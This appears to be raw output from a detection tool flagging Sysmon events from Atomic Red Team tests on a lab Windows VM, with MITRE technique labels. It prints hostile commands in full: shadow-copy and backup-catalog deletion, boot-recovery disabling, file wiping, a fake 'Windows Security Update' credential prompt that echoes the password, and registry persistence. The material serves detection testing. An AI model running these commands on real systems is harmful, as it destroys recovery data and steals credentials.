C:\Windows\Temp\bitsadmin_flag.ps1" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547684.103366,2019-07-19T18:48:04.103366+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3653 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:57.265 747F3D96-D81D-5D31-0000-0010D7CD2B00 7080 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547677.274199,2019-07-19T18:47:57.274199+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" ),1," 1 5 4 1 0 0x8000000000000000 3652 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:57.189 747F3D96-D81D-5D31-0000-0010B8CA2B00 1632 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "sdelete.exe C:\some\file.txt" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547677.227966,2019-07-19T18:47:57.227966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3651 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:51.972 747F3D96-D817-5D31-0000-0010C8BA2B00 7040 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547672.010791,2019-07-19T18:47:52.010791+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" ),1," 1 5 4 1 0 0x8000000000000000 3649 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:51.899 747F3D96-D817-5D31-0000-001049B42B00 6216 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} recoveryenabled no" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547671.865963,2019-07-19T18:47:51.865963+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" ),1," 1 5 4 1 0 0x8000000000000000 3647 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:51.784 747F3D96-D817-5D31-0000-001064AD2B00 6508 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3645 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:46.104 747F3D96-D812-5D31-0000-0010AC892B00 2948 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," 1 5 4 1 0 0x8000000000000000 1966704 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 23:18:42.516 365ABB72-78D2-5C91-0000-0010D8A50200 2572 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" C:\Windows\system32\ EXAMPLE\user01 365ABB72-77C4-5C91-0000-0020AD7D0100 0x17dad 1 High MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-785E-5C91-0000-00103FEA0100 1928 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" ),1," 1 5 4 1 0 0x8000000000000000 3641 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:45.569 747F3D96-D811-5D31-0000-001000632B00 4500 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wbadmin.exe delete catalog -quiet" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3640 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:40.849 747F3D96-D80C-5D31-0000-001005542B00 1348 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" ),1," 1 5 4 1 0 0x8000000000000000 3638 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:40.568 747F3D96-D80C-5D31-0000-0010223C2B00 6896 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3637 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:37.170 747F3D96-D809-5D31-0000-001072292B00 980 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" ),1," 1 5 4 1 0 0x8000000000000000 3633 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:47:37.083 747F3D96-D809-5D31-0000-00100A242B00 3968 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}") in directory : ( C:\AtomicRedTeam\ )",1," 1 5 4 1 0 0x8000000000000000 3631 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:46:51.935 747F3D96-D7DB-5D31-0000-0010B5A82A00 4452 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-D7DB-5D31-0000-001089A52A00 4256 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1," 1 5 4 1 0 0x8000000000000000 3631 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:46:51.935 747F3D96-D7DB-5D31-0000-0010B5A82A00 4452 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-D7DB-5D31-0000-001089A52A00 4256 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1," 1 5 4 1 0 0x8000000000000000 3630 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:46:51.871 747F3D96-D7DB-5D31-0000-001089A52A00 4256 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," 1 5 4 1 0 0x8000000000000000 3617 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:46:19.023 747F3D96-D7BB-5D31-0000-0010E7FE2900 2056 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 4.7.3190.0 built by: NET472REL1LAST_C Visual C# Command Line Compiler Microsoft® .NET Framework Microsoft Corporation "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3616 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:45:56.040 747F3D96-D7A4-5D31-0000-001020C62900 4080 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," 1 5 4 1 0 0x8000000000000000 3695 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.710 747F3D96-D87C-5D31-0000-0010CA5B3100 956 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1," 1 5 4 1 0 0x8000000000000000 3693 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.629 747F3D96-D87C-5D31-0000-00103F573100 2440 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1," 1 5 4 1 0 0x8000000000000000 3691 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.541 747F3D96-D87C-5D31-0000-0010B4523100 4016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," 1 5 4 1 0 0x8000000000000000 3689 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.447 747F3D96-D87C-5D31-0000-0010264E3100 1428 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," 1 5 4 1 0 0x8000000000000000 3687 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.377 747F3D96-D87C-5D31-0000-001097493100 1680 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High 